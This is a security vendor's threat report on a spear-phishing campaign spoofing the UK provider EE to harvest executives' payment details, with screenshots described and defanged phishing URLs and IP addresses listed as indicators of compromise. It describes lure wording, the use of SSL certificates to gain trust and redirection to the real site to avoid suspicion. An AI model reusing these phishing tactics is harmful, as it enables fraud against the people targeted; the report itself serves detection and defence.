All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Targeted Attack Uses Fake EE Email to Deceive Users

By Kian Mahdavi and Tej Tulachan, Cofense Phishing Defense Center

The Cofense Phishing Defense Center (PDC) has discovered a spear-phishing campaign designed to defraud corporate executives’ payment details by spoofing EE, a well-known UK-based telecommunications and internet service provider.  These spear phishing messages were reported to the Cofense PDC by end users whose email environments are protected by Microsoft 365 EOP and Symantec. This new, targeted campaign shows that while exploiting well-known telecommunications brands is nothing new, such phishing emails continue to go undetected by popular email gateways designed to protect end users, leading to possible theft of prized corporate credentials

Figure 1: Email Body

Threat actors sent a targeted email to a few executives, including one at a leading financial firm, with the subject line reading ‘View Bill – Error’ from a purchased top-level domain (moniquemoll[.]nl). These details in and of themselves may raise red flags to eagle-eyed recipients, as EE’s trademarked name isn’t included in any part of the full email address.

The malicious URL inserted within the text is:

hXXps://fly-guyz[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo

The vague email indicates ‘we’re working to get this fixed’. At no point does the email give an indication what this error is. As we read on, the second hyperlink states ‘view billing to make sure your account details are correct’ to entice the recipient to click the phishing link.

The threat actor fails to include the correct registered office address, evident towards the bottom of the email. Once the threat actor’s social engineering does the trick and the user clicks one of the links, they are redirected to a phishing page.

Noted in Figure 2 below is the trusted HTTPS protocol (also displayed as the green padlock) within the URL, giving false hope to the user that network traffic is being encrypted, ensuring all data transferred between the browser and website is secure and not being eavesdropped on.

However, the threat actor even went to the trouble of obtaining SSL certificates for the domain to further gain end users’ trust. In fact, it has become much easier for site owners, including fraudsters, to obtain these certificates.

Figures 2 and 3: First and second phishing pages

The peculiar aspect is the message in which the threat actor included: ‘You will not be charged’ to reassure recipients and trick them into providing their payment information.  The user is then automatically redirected to the legitimate EE website, as displayed below in Figure 4, to avoid suspicion. This is a common tactic to make the user believe the session timed out or their password was mistyped.

Figure 4: Legitimate Redirect Login Page

At the time of writing, the phishing page is still live and active. To further validate the analysis of the investigation, we decided to input some fake credentials, allowing us to verify the transmitted TCP requests and redirects to the fraudster’s domain at hXXps://kbimperial[.]com/data[.]php.

Figure 5: TCP Retransmission Packets

Indicators of Compromise:

Network IOC IP
hXXps://fly-guyz[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo/
hXXps://kbimperial[.]com/ee[.]co[.]uk[.]edcnymdsqmnydqnyo/logins
hXXps://kbimperial[.]com/data[.]php?
104[.]31[.]82[.]7
104[.]31[.]83[.]7
35[.]208[.]71[.]62

 

Discover how cybersecurity awareness training can help your organization defend against changing phishing threats.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.